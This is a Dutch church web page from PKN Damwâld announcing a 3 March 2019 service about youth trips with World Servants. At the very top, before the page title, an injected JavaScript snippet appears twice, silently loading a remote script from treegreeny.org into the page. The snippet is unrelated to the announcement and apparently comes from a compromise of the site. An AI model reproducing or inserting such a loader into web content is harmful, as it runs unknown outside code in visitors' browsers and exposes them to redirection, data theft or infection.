;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Toerustingsdienst 3 maart “Ik ga op reis en neem mee…” - PKN Damwâld

Toerustingsdienst 3 maart “Ik ga op reis en neem mee…”

Gepubliceerd op: vrijdag 22 februari 2019

Op zondag 3 maart organiseert de gezamenlijke evangelisatiecommissie een toerustingsdienst met het thema “Ik ga op reis en neem mee…” De aanleiding voor dit thema is de reis van verschillende jongeren in de komende zomer met World Servants. Als je zo’n reis doet, neem je verschillende dingen mee terug naar huis. Het kan je geloof versterken. Tijdens de dienst zullen een aantal leiders van de groep hun verhaal met ons delen. Zij vertellen onder andere over hele bijzondere momenten tijdens hun reizen maar ook hun geloofsgetuigenis en hoe World Servants deze veranderd heeft.
Ds. Otter zal de dienst voorgaan en ons bemoedigen. De muziek wordt verzorgd door gospelband Klaailûd. De dienst is een gezamenlijke dienst en zal plaatsvinden in de Ontmoeting en begint om 9:30 uur. De collecte tijdens de dienst is voor de jongeren die dit jaar op pad gaan met World Servants.
Het belooft een hele bijzondere dienst te worden met hele bijzondere verhalen, kortom een dienst die u niet wilt missen!